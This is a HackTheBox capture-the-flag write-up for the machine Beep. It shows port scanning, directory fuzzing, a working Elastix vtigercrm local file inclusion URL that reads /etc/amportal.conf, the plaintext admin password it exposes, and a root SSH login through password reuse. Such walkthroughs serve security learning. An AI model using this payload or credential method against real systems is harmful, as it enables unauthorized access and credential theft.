HackTheBox - Beep

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #linux #ssh #apache #elastix #lfi #local-file-inclusion #voip #asterisk #webmin #password-reuse #legacy-tls #centos

An older Linux machine running a heavily-featured VoIP platform — a well-known local file inclusion vulnerability exposes a configuration file, and the credentials inside turn out to open more doors than expected.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
$ ip=10.129.229.183; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-29 03:25 -0400
Nmap scan report for 10.129.229.183
Host is up (0.43s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.229.183/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            853/udp   status
|_  100024  1            856/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry 
|_/
|_ssl-date: 2026-03-29T07:30:05+00:00; -52s from scanner time.
856/tcp   open  status     1 (RPC #100024)
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4190/tcp  open  sieve?
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax?
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1

Host script results:
|_clock-skew: -52s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 593.53 seconds

The scan reveals a heavily-featured VoIP stack. Key services:

  • 443/tcp — Apache serving an Elastix login page
  • 5038/tcp — Asterisk Call Manager 1.1
  • 10000/tcp — Webmin 1.570
  • 25/tcp, 110/tcp, 143/tcp, 993/tcp, 995/tcp — mail services (SMTP, POP3, IMAP and their SSL variants)

Foothold

TLS Version Fix

Navigating to https://10.129.229.183/ returns SSL_ERROR_UNSUPPORTED_VERSION — the server uses an outdated TLS version that modern browsers reject by default. Fix this in Firefox by going to about:config and setting security.tls.version.min to 1.

Directory Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ ffuf -c -u https://10.129.229.183/FUZZ -w /usr/share/wordlists/dirb/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://10.129.229.183/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 1785, Words: 103, Lines: 35, Duration: 289ms]
.hta                    [Status: 403, Size: 286, Words: 21, Lines: 11, Duration: 297ms]
.htaccess               [Status: 403, Size: 291, Words: 21, Lines: 11, Duration: 285ms]
.htpasswd               [Status: 403, Size: 291, Words: 21, Lines: 11, Duration: 186ms]
admin                   [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 189ms]
cgi-bin/                [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 183ms]
configs                 [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 182ms]
favicon.ico             [Status: 200, Size: 894, Words: 6, Lines: 1, Duration: 192ms]
help                    [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 192ms]
images                  [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 186ms]
index.php               [Status: 200, Size: 1785, Words: 103, Lines: 35, Duration: 213ms]
lang                    [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 192ms]
libs                    [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 185ms]
mail                    [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 201ms]
modules                 [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 197ms]
panel                   [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 177ms]
robots.txt              [Status: 200, Size: 28, Words: 3, Lines: 3, Duration: 180ms]
static                  [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 232ms]
themes                  [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 226ms]
var                     [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 197ms]
:: Progress: [4614/4614] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:32] :: Errors: 0 ::

Nothing immediately useful, but the Elastix version running is known to be vulnerable to LFI.

Elastix LFI — Credential Extraction

This version of Elastix is vulnerable to a local file inclusion in the vtigercrm module. The following URL reads /etc/amportal.conf — the FreePBX/Asterisk configuration file — which contains plaintext credentials:

1
https://10.129.229.183/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

The file yields the admin password: jEhdIekWmdjE.

Logging in to the Elastix web panel with admin:jEhdIekWmdjE succeeds but provides nothing further of use.

Privilege Escalation

Password Reuse — Direct Root SSH

The password jEhdIekWmdjE is reused for the root system account. Since the server runs a very old OpenSSH version, legacy key exchange algorithms must be specified explicitly:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ ssh \
  -oKexAlgorithms=+diffie-hellman-group14-sha1 \
  -oHostKeyAlgorithms=+ssh-rsa \
  root@10.129.18.239
The authenticity of host '10.129.18.239 (10.129.18.239)' can't be established.
RSA key fingerprint is: SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.18.239' (RSA) to the list of known hosts.
root@10.129.18.239's password: 
Last login: Wed Nov 15 12:55:38 2023

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.129.18.239

[root@beep ~]#

Logged in directly as root. Both the user and root flags are accessible.